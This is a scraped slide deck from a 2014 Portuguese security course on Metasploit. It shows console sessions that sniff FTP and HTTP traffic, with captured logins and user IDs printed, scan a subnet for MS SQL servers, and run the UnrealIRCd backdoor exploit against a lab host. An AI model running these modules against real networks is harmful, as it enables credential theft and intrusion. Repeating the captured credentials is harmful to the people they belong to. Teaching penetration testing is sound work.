Download presentation
Presentation is loading. Please wait.
1
Metasploit 2 Cerutti-IES 2014 Seja periódico e Consistente. Em tudo, pela vida toda. Principalmente nas questões relativas a segurança Seja periódico e Consistente. Em tudo, pela vida toda. Principalmente nas questões relativas a segurança
3
O Que caracteriza um bom Framework?
4
frameworks
7
SQL Microsoft
9
Cargas disponíveis
13
Saindo (descarregando) módulos Comando=back:
16
Password Sniffing > use auxiliary/sniffer/psnuffle msf > use auxiliary/sniffer/psnuffle msf auxiliary(psnuffle) > run [*] Auxiliary module execution completed [*] Loaded protocol FTP from /opt/metasploit/apps/pro/msf3/data/exploits/psnuffle/ftp.rb... [*] Loaded protocol IMAP from /opt/metasploit/apps/pro/msf3/data/exploits/psnuffle/imap.rb... [*] Loaded protocol POP3 from /opt/metasploit/apps/pro/msf3/data/exploits/psnuffle/pop3.rb... [*] Loaded protocol SMB from /opt/metasploit/apps/pro/msf3/data/exploits/psnuffle/smb.rb... msf auxiliary(psnuffle) > [*] Loaded protocol URL from /opt/metasploit/apps/pro/msf3/data/exploits/psnuffle/url.rb... [*] Sniffing traffic..... host_int=2716808549&ns_map=71378968_201026015668248%2C685054872_927498946 4&user_id=44464479&nid=1396008608701611341&ts=1415041703 [*] Failed FTP Login: 172.16.2.32:55773-143.106.10.149:21 >> fernandocerutti / baguinha
![Password Sniffing > use auxiliary/sniffer/psnuffle msf > use auxiliary/sniffer/psnuffle msf auxiliary(psnuffle) > run [*] Auxiliary module execution completed [*] Loaded protocol FTP from /opt/metasploit/apps/pro/msf3/data/exploits/psnuffle/ftp.rb...](http://images.slideplayer.com/12/3953706/slides/slide_16.jpg "[*] Loaded protocol IMAP from /opt/metasploit/apps/pro/msf3/data/exploits/psnuffle/imap.rb... [*] Loaded protocol POP3 from /opt/metasploit/apps/pro/msf3/data/exploits/psnuffle/pop3.rb... [*] Loaded protocol SMB from /opt/metasploit/apps/pro/msf3/data/exploits/psnuffle/smb.rb... msf auxiliary(psnuffle) > [*] Loaded protocol URL from /opt/metasploit/apps/pro/msf3/data/exploits/psnuffle/url.rb... [*] Sniffing traffic..... host_int= &ns_map= _ %2C _ &user_id= &nid= &ts= [*] Failed FTP Login: : :21 >> fernandocerutti / baguinha.")
17
[*] HTTP GET: 172.16.2.32:51435-108.160.167.155:80 http://notify10.dropbox.com/subscribe?host_int=2716808549&ns_map=71378968_20102 6015668248%2C685054872_9274989464&user_id=44464479&nid=139600860870161134 1&ts=1415041759 [*] Successful FTP Login: 172.16.2.32:55773-143.106.10.149:21 >> anonymous / [*] HTTP GET: 172.16.2.32:51435-108.160.167.155:80 http://notify10.dropbox.com/subscribe?host_int=2716808549&ns_map=71378968_20102 6015668248%2C685054872_9274989464&user_id=44464479&nid=139600860870161134 1&ts=1415041815 [*] Successful FTP Login: 172.16.2.32:55774-143.106.10.149:21 >> anonymous / caraca
![[*] HTTP GET: : :80 host_int= &ns_map= _ %2C _ &user_id= &nid= &ts= [*] Successful FTP Login: : :21 >> anonymous / [*] HTTP GET: : :80 host_int= &ns_map= _ %2C _ &user_id= &nid= &ts= [*] Successful FTP Login: : :21 >> anonymous / caraca](http://images.slideplayer.com/12/3953706/slides/slide_17.jpg "[*] HTTP GET: : :80 host_int= &ns_map= _ %2C _ &user_id= &nid= &ts= [*] Successful FTP Login: : :21 >> anonymous / [*] HTTP GET: : :80 host_int= &ns_map= _ %2C _ &user_id= &nid= &ts= [*] Successful FTP Login: : :21 >> anonymous / caraca")
18
http sem segurança- em texto plano [*] HTTP GET: 172.16.2.32:55870-189.45.193.236:80 http://www.google- analytics.com/__utm.gif?utmwv=5.6.0&utms=7&utmn=2092148068&utmhn= www.sli deshare.net&utmt =event&utme=5(search_content*search_pageload*Description %20HL%20Percentage)(216)8(member_type)9(FREE)11(1)&utmcs=UTF- 8&utmsr=1280x800&utmvp=1091x648&utmsc=24-bit&utmul=en- us&utmje=1&utmfl=15.0%20r0&utmdt=%27 metasploit %27%20on%20SlideShare&ut mhid=1487026120&utmr=0&utmp=%2Fsearch%2Fslideshow%3Fsearchfrom%3Dheader %26q%3Dmetasploit&utmht=1415042586183&utmac=UA-2330466- 1&utmcc=__utma%3D186399478.1164355194.1409685008.1415014839.1415042574.33 %3B%2B__utmz%3D186399478.1414784276.30.12.utmcsr%3Dgoogle%7Cutmccn%3D(or ganic)%7Cutmcmd%3Dorganic%7Cutmctr%3D(not%2520provided)%3B%2B__utmv%3D1 86399478.member%3B&utmjid=&utmu=6RAAACAAAAAAAAAAAAAAAAAE~ [*] HTTP GET: 172.16.2.32:55886-189.45.193.245:80 http://t0.gstatic.com/favicon?q=tbn:ANd9GcQC6FFzVoDxm5kT- E5saE0q8AysNEyZiXdMtJwzLZrrD-93ly2lmHo0qH_eNWClKa8vX-zMT3w
![http sem segurança- em texto plano [*] HTTP GET: : :80 analytics.com/__utm.gif utmwv=5.6.0&utms=7&utmn= &utmhn= deshare.net&utmt =event&utme=5(search_content*search_pageload*Description %20HL%20Percentage)(216)8(member_type)9(FREE)11(1)&utmcs=UTF- 8&utmsr=1280x800&utmvp=1091x648&utmsc=24-bit&utmul=en- us&utmje=1&utmfl=15.0%20r0&utmdt=%27 metasploit %27%20on%20SlideShare&ut mhid= &utmr=0&utmp=%2Fsearch%2Fslideshow%3Fsearchfrom%3Dheader %26q%3Dmetasploit&utmht= &utmac=UA &utmcc=__utma%3D %3B%2B__utmz%3D utmcsr%3Dgoogle%7Cutmccn%3D(or ganic)%7Cutmcmd%3Dorganic%7Cutmctr%3D(not%2520provided)%3B%2B__utmv%3D member%3B&utmjid=&utmu=6RAAACAAAAAAAAAAAAAAAAAE~ [*] HTTP GET: : :80 q=tbn:ANd9GcQC6FFzVoDxm5kT- E5saE0q8AysNEyZiXdMtJwzLZrrD-93ly2lmHo0qH_eNWClKa8vX-zMT3w](http://images.slideplayer.com/12/3953706/slides/slide_18.jpg "http sem segurança- em texto plano [*] HTTP GET: : :80 analytics.com/__utm.gif utmwv=5.6.0&utms=7&utmn= &utmhn= deshare.net&utmt =event&utme=5(search_content*search_pageload*Description %20HL%20Percentage)(216)8(member_type)9(FREE)11(1)&utmcs=UTF- 8&utmsr=1280x800&utmvp=1091x648&utmsc=24-bit&utmul=en- us&utmje=1&utmfl=15.0%20r0&utmdt=%27 metasploit %27%20on%20SlideShare&ut mhid= &utmr=0&utmp=%2Fsearch%2Fslideshow%3Fsearchfrom%3Dheader %26q%3Dmetasploit&utmht= &utmac=UA &utmcc=__utma%3D %3B%2B__utmz%3D utmcsr%3Dgoogle%7Cutmccn%3D(or ganic)%7Cutmcmd%3Dorganic%7Cutmctr%3D(not%2520provided)%3B%2B__utmv%3D member%3B&utmjid=&utmu=6RAAACAAAAAAAAAAAAAAAAAE~ [*] HTTP GET: : :80 q=tbn:ANd9GcQC6FFzVoDxm5kT- E5saE0q8AysNEyZiXdMtJwzLZrrD-93ly2lmHo0qH_eNWClKa8vX-zMT3w")
19
sniff ] HTTP GET: 172.16.2.49:40582-91.189.89.22:80 http://videosearch.ubuntu.com/v0/search?q=&split=true&form_factor=desktop [*] HTTP GET: 172.16.2.49:46231-189.45.193.241:80 http://i.ytimg.com/vi/ROhRv09bCWU/mqdefault.jpg [*] HTTP GET: 172.16.2.49:46232-189.45.193.241:80 http://i.ytimg.com/vi/mO1QBTG6EXs/mqdefault.jpg [*] HTTP GET: 172.16.2.49:46233-189.45.193.241:80 http://i.ytimg.com/vi/GH7noNdd1l8/mqdefault.jpg [*] HTTP GET: 172.16.2.49:46234-189.45.193.241:80 http://i.ytimg.com/vi/GDlm84gSRv4/movieposter.jpg [*] HTTP GET: 172.16.2.49:46235-189.45.193.241:80 http://i.ytimg.com/vi/vekNlWVqEnQ/mqdefault.jpg [*] HTTP GET: 172.16.2.49:41898-189.45.193.211:80 http://i.ytimg.com/vi/hWLN8AATXlw/movieposter.jpg [*] HTTP GET: 172.16.2.49:38110-189.45.193.249:80 http://i.ytimg.com/vi/RKs6ikmrLgg/movieposter.jpg [*] HTTP GET: 172.16.2.49:43160-189.45.193.236:80 http://i.ytimg.com/vi/ZQRONGsLu4A/mqdefault.jpg [*] HTTP GET: 172.16.2.49:50594-72.21.91.75:80 http://s1.dmcdn.net/AMRhc/80x60-9ja.jpg [*] HTTP GET: 172.16.2.49:50595-72.21.91.75:80 http://s1.dmcdn.net/tFBO/80x60-YN8.jpg [*] HTTP GET: 172.16.2.49:50596-72.21.91.75:80 http://s1.dmcdn.net/oiaV/80x60-YM6.jpg [*] HTTP GET: 172.16.2.49:50597-72.21.91.75:80 http://s2.dmcdn.net/zw9I/80x60-M5j.jpg [*] HTTP GET: 172.16.2.49:50598-72.21.91.75:80 http://s2.dmcdn.net/MRil/80x60-2HI.jpg [*] HTTP GET: 172.16.2.49:51624-189.45.193.207:80 http://i.ytimg.com/vi/DTBWoKjtur8/movieposter.jpg [*] HTTP GET: 172.16.2.49:55606-189.45.193.222:80 http://i.ytimg.com/vi/SV0VxWxg0oI/movieposter.jpg [*] HTTP GET: 172.16.2.49:33244-189.45.193.221:80 http://i.ytimg.com/vi/m2qB16oWYTs/movieposter.jpg [*] HTTP GET: 172.16.2.49:56212-189.45.193.237:80 http://i.ytimg.com/vi/n6op2UcrOFg/movieposter.jp
![sniff ] HTTP GET: : :80 q=&split=true&form_factor=desktop [*] HTTP GET: : :80 [*] HTTP GET: : :80 [*] HTTP GET: : :80 [*] HTTP GET: : :80 [*] HTTP GET: : :80 [*] HTTP GET: : :80 [*] HTTP GET: : :80 [*] HTTP GET: : :80 [*] HTTP GET: : :80 [*] HTTP GET: : :80 [*] HTTP GET: : :80 [*] HTTP GET: : :80 [*] HTTP GET: : :80 [*] HTTP GET: : :80 [*] HTTP GET: : :80 [*] HTTP GET: : :80 [*] HTTP GET: : :80](http://images.slideplayer.com/12/3953706/slides/slide_19.jpg "sniff ] HTTP GET: : :80 q=&split=true&form_factor=desktop [*] HTTP GET: : :80 [*] HTTP GET: : :80 [*] HTTP GET: : :80 [*] HTTP GET: : :80 [*] HTTP GET: : :80 [*] HTTP GET: : :80 [*] HTTP GET: : :80 [*] HTTP GET: : :80 [*] HTTP GET: : :80 [*] HTTP GET: : :80 [*] HTTP GET: : :80 [*] HTTP GET: : :80 [*] HTTP GET: : :80 [*] HTTP GET: : :80 [*] HTTP GET: : :80 [*] HTTP GET: : :80 [*] HTTP GET: : :80")
20
Ms SQL msf > nmap -sU 192.168.0.0/24 -p1434 [*] exec: nmap -sU 192.168.0.0/24 -p1434 Starting Nmap 6.46 ( http://nmap.org ) at 2014-11-03 12:26 PST Nmap scan report for 192.168.0.1 Host is up (0.049s latency). PORT STATE SERVICE 1434/udp open|filtered ms-sql-m MAC Address: 84:C9:B2:55:A7:03 (D-Link International) Nmap scan report for 192.168.0.109 Host is up (0.0053s latency). PORT STATE SERVICE 1434/udp closed ms-sql-m MAC Address: 00:0C:29:6F:8D:07 (VMware) Nmap scan report for 192.168.0.119 Host is up (0.17s latency). PORT STATE SERVICE 1434/udp open|filtered ms-sql-m MAC Address: 64:6C:B2:4E:62:B3 (Samsung Electronics Co.)
![Ms SQL msf > nmap -sU /24 -p1434 [*] exec: nmap -sU /24 -p1434 Starting Nmap 6.46 ( ) at :26 PST Nmap scan report for Host is up (0.049s latency).](http://images.slideplayer.com/12/3953706/slides/slide_20.jpg "PORT STATE SERVICE 1434/udp open|filtered ms-sql-m MAC Address: 84:C9:B2:55:A7:03 (D-Link International) Nmap scan report for Host is up (0.0053s latency). PORT STATE SERVICE 1434/udp closed ms-sql-m MAC Address: 00:0C:29:6F:8D:07 (VMware) Nmap scan report for Host is up (0.17s latency). PORT STATE SERVICE 1434/udp open|filtered ms-sql-m MAC Address: 64:6C:B2:4E:62:B3 (Samsung Electronics Co.).")
21
msf > use scanner/mssql/mssql_ping msf auxiliary(mssql_ping) > set RHOSTS 192.168.0.0/24 RHOSTS => 192.168.0.0/24 msf auxiliary(mssql_ping) > set THREADS 20 THREADS => 20 msf auxiliary(mssql_ping) > exploit [*] Scanned 026 of 256 hosts (010% complete) [*] Scanned 052 of 256 hosts (020% complete) [*] Scanned 079 of 256 hosts (030% complete) [*] Scanned 104 of 256 hosts (040% complete) [*] Scanned 141 of 256 hosts (055% complete) [*] Scanned 154 of 256 hosts (060% complete) [*] Scanned 182 of 256 hosts (071% complete) [*] Scanned 206 of 256 hosts (080% complete) [*] Scanned 244 of 256 hosts (095% complete) [*] Scanned 256 of 256 hosts (100% complete) [*] Auxiliary module execution completed msf auxiliary(mssql_ping) >
![msf > use scanner/mssql/mssql_ping msf auxiliary(mssql_ping) > set RHOSTS /24 RHOSTS => /24 msf auxiliary(mssql_ping) > set THREADS 20 THREADS => 20 msf auxiliary(mssql_ping) > exploit [*] Scanned 026 of 256 hosts (010% complete) [*] Scanned 052 of 256 hosts (020% complete) [*] Scanned 079 of 256 hosts (030% complete) [*] Scanned 104 of 256 hosts (040% complete) [*] Scanned 141 of 256 hosts (055% complete) [*] Scanned 154 of 256 hosts (060% complete) [*] Scanned 182 of 256 hosts (071% complete) [*] Scanned 206 of 256 hosts (080% complete) [*] Scanned 244 of 256 hosts (095% complete) [*] Scanned 256 of 256 hosts (100% complete) [*] Auxiliary module execution completed msf auxiliary(mssql_ping) >](http://images.slideplayer.com/12/3953706/slides/slide_21.jpg "msf > use scanner/mssql/mssql_ping msf auxiliary(mssql_ping) > set RHOSTS /24 RHOSTS => /24 msf auxiliary(mssql_ping) > set THREADS 20 THREADS => 20 msf auxiliary(mssql_ping) > exploit [*] Scanned 026 of 256 hosts (010% complete) [*] Scanned 052 of 256 hosts (020% complete) [*] Scanned 079 of 256 hosts (030% complete) [*] Scanned 104 of 256 hosts (040% complete) [*] Scanned 141 of 256 hosts (055% complete) [*] Scanned 154 of 256 hosts (060% complete) [*] Scanned 182 of 256 hosts (071% complete) [*] Scanned 206 of 256 hosts (080% complete) [*] Scanned 244 of 256 hosts (095% complete) [*] Scanned 256 of 256 hosts (100% complete) [*] Auxiliary module execution completed msf auxiliary(mssql_ping) >")
22
Backdoor no linux use exploit/unix/irc/unreal_ircd_3281_backdoor msf exploit(unreal_ircd_3281_backdoor) > msf exploit(unreal_ircd_3281_backdoor) > set RHOST 172.16.193.213 RHOST => 172.16.193.213 msf exploit(unreal_ircd_3281_backdoor) > exploit
23
Saida exploit backdoor
24
Dotdefender Wget
Similar presentations
